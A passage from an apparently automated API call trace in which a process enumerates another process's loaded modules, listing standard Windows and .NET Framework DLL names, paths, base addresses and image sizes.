lpBaseName="apphelp.dll") returned 0xb [0142.750] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0142.750] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x2419584, cb=0xc | out: lpmodinfo=0x2419584*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0142.751] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0142.751] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0142.751] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x241b698, cb=0xc | out: lpmodinfo=0x241b698*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0142.751] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0142.752] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0142.752] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x241d7a4, cb=0xc | out: lpmodinfo=0x241d7a4*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0142.752] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0142.753] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0142.753] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x241f8fc, cb=0xc | out: lpmodinfo=0x241f8fc*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0142.753] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0142.754] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0142.754] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x2421a08, cb=0xc | out: lpmodinfo=0x2421a08*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0142.754] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0142.755] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0142.755] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x2423b14, cb=0xc | out: lpmodinfo=0x2423b14*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0142.755] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0142.756] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0142.756] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x2425c28, cb=0xc | out: lpmodinfo=0x2425c28*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0142.756] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0142.757] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0142.757] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x2427d5c, cb=0xc | out: lpmodinfo=0x2427d5c*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0142.757] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0142.758] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0142.758] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x2429ea4, cb=0xc | out: lpmodinfo=0x2429ea4*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0142.759] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0142.759] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0142.761] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x242bfb0, cb=0xc | out: lpmodinfo=0x242bfb0*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0142.762] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0142.762] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0142.763] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x242e0bc, cb=0xc | out: lpmodinfo=0x242e0bc*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0142.763] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0142.763] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0142.764] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x243024c, cb=0xc | out: lpmodinfo=0x243024c*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0142.764] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0142.765] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0142.765] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x2432358, cb=0xc | out: lpmodinfo=0x2432358*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0142.766] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0142.766] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0142.767] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x243445c, cb=0xc | out: lpmodinfo=0x243445c*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0142.767] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0142.767] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0142.768] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x2436588, cb=0xc | out: lpmodinfo=0x2436588*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0142.768] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0142.769] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0142.769] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x2438694, cb=0xc | out: lpmodinfo=0x2438694*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0142.770] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0142.770] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0142.771] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x243a7c4, cb=0xc | out: lpmodinfo=0x243a7c4*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0142.771] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0142.772] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0142.773] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x243c8f8, cb=0xc | out: lpmodinfo=0x243c8f8*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0142.773] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0142.774] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0142.774] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x243eaa0, cb=0xc | out: lpmodinfo=0x243eaa0*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0142.776] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0142.776] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0142.777] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x2440ba4, cb=0xc | out: lpmodinfo=0x2440ba4*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0142.777] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0142.778] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0142.779] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x2442cb0, cb=0xc | out: lpmodinfo=0x2442cb0*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0142.779] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0142.780] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0142.781] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x2444df0, cb=0xc | out: lpmodinfo=0x2444df0*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0142.781] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0142.782] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0142.782] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x2446f04, cb=0xc | out: lpmodinfo=0x2446f04*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0142.783] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0142.784] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0142.785] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x24490a0, cb=0xc | out: lpmodinfo=0x24490a0*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0142.785] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0142.786] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0142.787] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x244b26c, cb=0xc | out: lpmodinfo=0x244b26c*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0142.787] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0142.788] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0142.789] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x244d45c, cb=0xc | out: lpmodinfo=0x244d45c*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0142.789] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.790] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0142.792] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x244f620, cb=0xc | out: lpmodinfo=0x244f620*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0142.793] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.793] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0142.794] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x24518ec, cb=0xc | out: lpmodinfo=0x24518ec*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0142.795] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0142.796] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0142.796] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x24539f8, cb=0xc | out: lpmodinfo=0x24539f8*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0142.797] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0142.798] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0142.798] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x2455bb4, cb=0xc | out: lpmodinfo=0x2455bb4*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0142.799] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0142.800] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0142.801] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x2457da4, cb=0xc | out: lpmodinfo=0x2457da4*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0142.801] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0142.802] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0142.803] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x2459f58, cb=0xc | out: lpmodinfo=0x2459f58*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0142.804] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0142.804] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0142.805] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x245c05c, cb=0xc | out: lpmodinfo=0x245c05c*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0142.806] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0142.808] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0142.809] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x245e170, cb=0xc | out: lpmodinfo=0x245e170*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0142.810] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0142.811] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0142.811] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x246027c, cb=0xc | out: lpmodinfo=0x246027c*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0142.812] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0142.813] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0142.814] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x2462388, cb=0xc | out: lpmodinfo=0x2462388*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0142.815] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0142.816] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0142.817] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x2464494, cb=0xc | out: lpmodinfo=0x2464494*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0142.818] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0142.818] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0142.819] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x24665a0, cb=0xc | out: lpmodinfo=0x24665a0*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0142.820] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0142.821] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0142.822] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x24686ac, cb=0xc | out: lpmodinfo=0x24686ac*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0142.823] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0142.824] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: 